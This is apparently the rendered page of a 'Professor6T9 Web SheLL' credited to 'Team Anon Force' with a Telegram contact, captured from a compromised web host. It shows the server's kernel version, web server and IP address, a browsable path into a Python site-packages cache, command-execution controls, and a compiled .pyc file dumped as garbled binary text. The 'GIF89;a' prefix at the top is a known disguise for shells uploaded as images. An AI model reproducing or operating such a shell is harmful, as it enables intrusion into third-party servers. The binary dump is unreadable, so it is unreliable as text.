GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python311
/
lib
/
python3.11
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : build_scripts.cpython-311.pyc
� ,�Re� � � � d Z ddlZddlZddlmZ ddlmZ ddlmZ ddl m Z ddlmZ dd l mZ ddlZ ej d � � Z eZ G d� de� � ZdS ) zRdistutils.command.build_scripts Implements the Distutils 'build_scripts' command.� N)�ST_MODE)� sysconfig� )�Command)�newer)�convert_path)�logz^#!.*python[0-9.]*([ ].*)?$c �f � e Zd ZdZg d�ZdgZd� Zd� Zd� Zd� Z d� Z d � Zd � Zd� Z ed� � � Zd S )� build_scriptsz("build" scripts (copy and fixup #! line)))z build-dir=�dzdirectory to "build" (copy) to)�force�fz1forcibly build everything (ignore file timestamps)zexecutable=�ez*specify final destination interpreter pathr c �>